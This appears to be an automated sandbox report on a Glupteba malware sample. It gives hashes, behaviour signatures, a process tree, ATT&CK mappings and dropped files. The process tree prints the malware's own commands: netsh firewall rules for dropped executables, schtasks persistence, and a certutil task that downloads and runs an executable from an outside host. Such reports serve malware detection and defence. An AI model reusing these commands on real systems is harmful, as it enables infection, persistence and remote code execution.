Analysis

  • max time kernel
    95s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    23-05-2022 21:05

General

  • Target

    7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe

  • Size

    3.7MB

  • MD5

    1d719361bc2a069c28e029f773a81028

  • SHA1

    65cdf57a917c28147d1a9996e508a86bbdec4e50

  • SHA256

    7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f

  • SHA512

    38df046bb5b59f48bb58a14feed7826aeb7e480571c7f4f576192233d2c69dfc055db46e8d42649ff7d8e257c6706d4db8bb786600969e3cd6d091ec969174e9

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in System32 directory 6 IoCs
  • Drops file in Windows directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe
    "C:\Users\Admin\AppData\Local\Temp\7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3428
    • C:\Users\Admin\AppData\Local\Temp\7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe
      "C:\Users\Admin\AppData\Local\Temp\7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:100
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1500
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:4996
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1572
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes
            4⤵
              PID:4784
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4572
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:2116
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:4748
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:1952
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:2468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3916

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      2
      T1112

      Install Root Certificate

      1
      T1130

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.7MB

        MD5

        1d719361bc2a069c28e029f773a81028

        SHA1

        65cdf57a917c28147d1a9996e508a86bbdec4e50

        SHA256

        7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f

        SHA512

        38df046bb5b59f48bb58a14feed7826aeb7e480571c7f4f576192233d2c69dfc055db46e8d42649ff7d8e257c6706d4db8bb786600969e3cd6d091ec969174e9

      • C:\Windows\rss\csrss.exe
        Filesize

        3.7MB

        MD5

        1d719361bc2a069c28e029f773a81028

        SHA1

        65cdf57a917c28147d1a9996e508a86bbdec4e50

        SHA256

        7ade60bd4e14b4a94397a8138815b87f4fb68ff14875612db7bb1921bd60fb7f

        SHA512

        38df046bb5b59f48bb58a14feed7826aeb7e480571c7f4f576192233d2c69dfc055db46e8d42649ff7d8e257c6706d4db8bb786600969e3cd6d091ec969174e9

      • memory/100-133-0x0000000000000000-mapping.dmp
      • memory/100-136-0x0000000000ECD000-0x0000000001273000-memory.dmp
        Filesize

        3.6MB

      • memory/100-137-0x0000000000400000-0x0000000000BF1000-memory.dmp
        Filesize

        7.9MB

      • memory/1500-134-0x0000000000000000-mapping.dmp
      • memory/1572-138-0x0000000000000000-mapping.dmp
      • memory/1952-147-0x0000000000000000-mapping.dmp
      • memory/2116-145-0x0000000000000000-mapping.dmp
      • memory/2468-149-0x0000000000000000-mapping.dmp
      • memory/3428-130-0x00000000010CA000-0x0000000001470000-memory.dmp
        Filesize

        3.6MB

      • memory/3428-132-0x0000000000400000-0x0000000000BF1000-memory.dmp
        Filesize

        7.9MB

      • memory/3428-131-0x0000000001480000-0x0000000001B75000-memory.dmp
        Filesize

        7.0MB

      • memory/4572-140-0x0000000000000000-mapping.dmp
      • memory/4572-144-0x0000000000400000-0x0000000000BF1000-memory.dmp
        Filesize

        7.9MB

      • memory/4572-143-0x0000000001400000-0x00000000017A6000-memory.dmp
        Filesize

        3.6MB

      • memory/4748-146-0x0000000000000000-mapping.dmp
      • memory/4784-139-0x0000000000000000-mapping.dmp
      • memory/4996-135-0x0000000000000000-mapping.dmp